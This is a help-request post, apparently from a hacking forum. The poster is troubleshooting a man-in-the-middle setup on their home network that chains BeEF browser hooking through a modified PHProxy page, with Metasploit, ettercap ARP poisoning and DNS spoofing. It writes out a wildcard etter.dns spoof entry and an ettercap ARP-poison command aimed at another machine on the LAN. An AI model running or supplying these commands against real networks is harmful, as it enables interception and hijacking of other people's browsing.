My problem is...
Apache2(Which Beef, PHProxy, and MSF are hosted on) is at ServerName: 127.0.1.1 AKA my local ip of 192.168.2.5

BeEF can successfully be accessed through http://192.168.2.5/beef/

MSF successfully can be used through BeEF.

The problem I'm encountering is this:
When I go to 192.168.2.5 to setup PHProxy to attach my BeEF javascript exploit, it fails and brings up a download window for an empty file named "~".

I got around this by directly calling PHProxy at 192.168.2.5/index.php (/index.php contains modified PHProxy for attaching BeEF).

At this point, PHProxy works perfectly with BeEF on my local computer.

I have a desktop in another room on the same network at ip: 192.168.2.13

I DNS spoof them using this code:

Code:
Code:
echo "* A 192.168.2.5/index.php" >> /usr/share/ettercap/etter.dns
Then:
Code:
Code:
ettercap -T -i eth1 -M arp:remote /192.168.2.1/ /192.168.2.13/ -P dns_spoof
It seems to work. I walk to the next room and open IE8 and navigate to google.com

I walk back to the other room with the laptop hosting the DNS Spoof and can see all the traffic, WITH successful spoofs to 192.168.2.5. That's my problem. It didn't redirect to /index.php

How do I make is so that my Apache2 server @ 192.168.2.5 has PHProxy running on it's "ROOT"?

I suppose I could also modify my apache2.conf file to direct all connections to 192.168.2.5 to 192.168.2.5/index.php, but I don't know how to make the exception so that I can still connect to BeEF @ 192.168.2.5/beef without being redirected to PHProxy.

I used and modified versions of these guides to set it up...
Hack Forums
Hack Forums
Hack Forums
Setting a static or DHCP IP in Linux

i tried to give you as many details as possible. Once I figure this out, I'm making a NOOB Tutorial for this so it'll be easier for the next person XD